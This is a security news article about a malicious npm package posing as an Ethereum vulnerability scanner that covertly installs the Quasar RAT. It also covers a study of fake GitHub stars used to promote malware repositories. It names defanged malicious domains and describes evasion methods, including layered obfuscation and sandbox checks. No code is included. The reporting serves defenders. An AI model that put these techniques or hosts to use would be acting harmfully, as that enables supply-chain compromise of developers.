Cyber security news for all

More

    Malicious NPM Package Cloaked as Ethereum Tool Deploys Quasar RAT

    Cybersecurity specialists have unveiled a nefarious npm package masquerading as a tool for identifying vulnerabilities in Ethereum smart contracts. Contrary to its purported purpose, this package clandestinely deploys the Quasar RAT, an open-source remote access trojan, onto developer systems.

    The pernicious package, dubbed ethereumvulncontracthandler, was introduced to the npm repository on December 18, 2024, by an entity identified as “solidit-dev-416.” As of this writing, it remains accessible and has been downloaded 66 times.

    “Upon installation, the package fetches a malicious script from a remote host, executing it covertly to deliver the RAT onto Windows environments,” explained Socket security researcher Kirill Boychenko in a detailed analysis released last month.

    Obfuscation and Evasion Tactics

    The malicious payload within ethereumvulncontracthandler is deeply veiled using multiple obfuscation layers, employing methods such as Base64 encoding, XOR encoding, and minification to evade detection. These techniques complicate both analysis and identification by security systems.

    Additionally, the malware incorporates checks to detect sandboxed environments, ensuring it avoids execution in controlled setups. Once these conditions are bypassed, it acts as a loader, fetching a second-stage payload from a remote domain (“jujuju[.]lat”). This payload leverages PowerShell commands to activate Quasar RAT.

    Stealth and Persistence Mechanisms

    Quasar RAT embeds itself persistently by altering the Windows Registry and establishes communication with a command-and-control (C2) server (“captchacdn[.]com:7000”). This connection facilitates the exfiltration of sensitive information and enables the attacker to execute further instructions.

    Originally unveiled on GitHub in July 2014, Quasar RAT has served as a versatile tool for cybercrime and espionage, employed by numerous threat actors over the years.

    “The adversary utilizes this C2 server not only to monitor compromised systems but also to orchestrate multiple infected devices simultaneously, particularly if this operation is part of a botnet scheme,” Boychenko elaborated. “Once a victim’s system is breached, it is entirely under the attacker’s dominion, poised for ongoing exploitation.”

    The Growing Epidemic of Counterfeit GitHub Stars

    This revelation coincides with findings from a collaborative study by Socket, Carnegie Mellon University, and North Carolina State University, which uncovered a surge in counterfeit “stars” on GitHub. These stars are exploited to artificially amplify the visibility of malicious repositories.

    While the manipulation of stars is not a novel phenomenon, researchers found it predominantly promotes ephemeral malware repositories disguised as pirated software, gaming cheats, or cryptocurrency utilities. These repositories are often advertised via dubious platforms like Baddhi Shop and FollowDeh, which openly market GitHub engagement services.

    For example, Baddhi Shop sells 1,000 GitHub stars for $110, claiming to boost repository credibility. “Real engagement attracts more developers and contributors to your project!” boasts their promotional material.

    “Only a fraction of repositories leveraging fake star campaigns are listed on platforms like npm or PyPI,” the researchers noted. “Even fewer achieve significant adoption. Notably, 60% of accounts involved in such campaigns exhibit minimal activity beyond inflating star counts.”

    Mitigating Risks in the Open-Source Ecosystem

    The open-source software ecosystem, a frequent target for cyber attackers, underscores the need for vigilance when assessing repository credibility. Star counts alone, the study warns, are unreliable indicators of quality or reputation.

    In a statement issued in October 2023, GitHub acknowledged the prevalence of fake star campaigns and affirmed ongoing efforts to eradicate inauthentic activity.

    “The fundamental vulnerability of star counts as a metric lies in their uniform weighting of all user actions,” the researchers explained. “To counteract manipulation, GitHub might consider adopting a weighted popularity metric, factoring in dimensions such as network centrality, which are significantly harder to falsify.”

    By spotlighting this sophisticated npm package attack and the broader issue of counterfeit GitHub stars, these findings serve as a critical reminder of the evolving threats within the software supply chain.

    Recent Articles

    Related Stories